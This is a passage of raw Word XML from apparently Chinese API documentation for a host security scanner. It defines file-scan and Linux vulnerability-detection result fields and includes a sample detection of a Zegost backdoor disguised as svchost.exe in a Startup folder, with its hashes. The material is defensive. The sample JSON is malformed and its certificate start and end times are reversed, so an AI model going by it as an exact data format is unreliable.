          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C7E06E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>winSignInfoDtos 结构签名信息：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1325"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="13E7DD6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9DC1267" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ABAD9B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D3E9186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6461B84A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7756C686" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41258F2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>subjectUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58F2E4F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7946272C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1359CE94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>使用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="096F12CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570AFCD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>issuer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B919466" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF6E8EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D524D5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>颁发者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AA02063" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0530FB7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>beginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432CF361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E81AB94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA0105A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37921958" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C07720B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74AF0867" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E253B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB2C73B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AE328FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8AB48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>Data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  {\"uname\" : \"Administrator\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"pid\" : 2940,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"processPath\" : \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"processName\" : \"svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"cmdline\" : \"\\\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\\\" \",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"parentProcessName\" : \"Explorer.EXE\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"parentPid\" : 2180,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"parentPath\" : \"C:\\\\Windows\\\\Explorer.EXE\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"parentUserName\" : \"Administrator\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"path\" : \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"size\" : 1662736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"type\" : \"PE32\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"user\" : \"Administrators\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"changeTime\" : 1546394239,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"modifyTime\" : 1481516590,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"accessTime\" : 1546394239,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"md5\" : \"323443b3069a12499a0ca1d1d6ccd7ee\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"sha1\" : \"1c966941cee961286522f8cc1ac409d13c2d1b65\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"sha256\" : \"\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   \"winSignInfoDtos\":[{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"subjectUser":"Beijing Sogou Technology Development Co., Ltd.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"issuer\":\"VeriSign Class 3 Code Signing 2010 CA\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"beginTime\":1569599999,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"endTime\":1504713600</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  }]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"ruleResults\" : [ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"virusName\" : \"BDS/Zegost.Gen\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"virusDescription\" : \"Contains a detection pattern of the (dangerous) backdoor program BDS/Zegost.Gen Backdoor server programs\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"libUpdateTime\" : 1534953600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"libName\" : \"Avira\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"virusInstruct\" : null  } ]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFD1AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="附录3-linux漏洞检测-查询结果-data数据结构"/>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="257"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录3 Linux漏洞检测-查询结果-data数据结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBE90A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5716"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4FC0A45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087DC87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57241436" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E284E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B54D01D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56A27A44" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6D0268" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D022C17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0762662B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F6442E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27DA78E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32396F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>execute_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607A3151" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC2E53D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E135D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测方式，1 版本比对 2：POC检测 3：版本比对和POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C60ED4D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="035D17EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cve_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="256BA90E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E413C47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B2407E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cve_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0956463A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7C8069" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>poc_check_result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C570307" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="411BF6F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68DD3565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测结果，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>poc_check_result数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00291D23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD0CD13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>host_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E583FF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A9B06C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285FD989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EA4A252" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444F7C51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ver_check_result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3860F689" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADEB617" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFC85C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t xml:space="preserve">版本比对检测结果，见 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ver_check_result数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CF3EFC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>poc_check_result数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="751"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6890"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0C07A58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5421317" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E30783" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA4023B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F682E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C02DF9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C658024" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF1931E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA5EAA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A272D55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0 表示不受影响，1表示受影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D4FB155" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55493352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7442ADD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D144E9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
